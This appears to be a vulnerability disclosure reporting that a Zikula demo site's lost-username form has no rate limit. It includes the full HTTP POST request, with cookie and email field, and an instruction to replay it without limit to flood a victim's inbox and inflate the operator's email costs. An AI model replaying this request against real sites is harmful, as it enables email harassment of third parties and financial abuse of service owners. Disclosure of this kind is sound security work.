Description

Rate limit bypass sent unlimited email victim or any email address

Proof of Concept

There is no rate limit lost-user-name, attacker to send unlimited email to victim or any email address.

POST /zauth/account/lost-user-name HTTP/1.1
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 222
Origin: https://demo.ziku.la
Connection: close
Referer: https://demo.ziku.la/zauth/account/lost-user-name
Cookie: _zsid=1kkpnmtra80thcmftq7i4ots3d
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

zikulazauthmodule_account_lostusername%5Bemail%5D=aravindtestx%40gmail.com

Post data email= parameter value to victim mail. this request unlimited time and victim email address will received unlimited verification email .

Impact

Attacker can sent unlimited email to any mail address . Many email service provider has limited email sending like 1000 email per month . If you exceed that limit then you will be extra charged . So, using this attack attacker can exceed that limit and company will be charged extra money.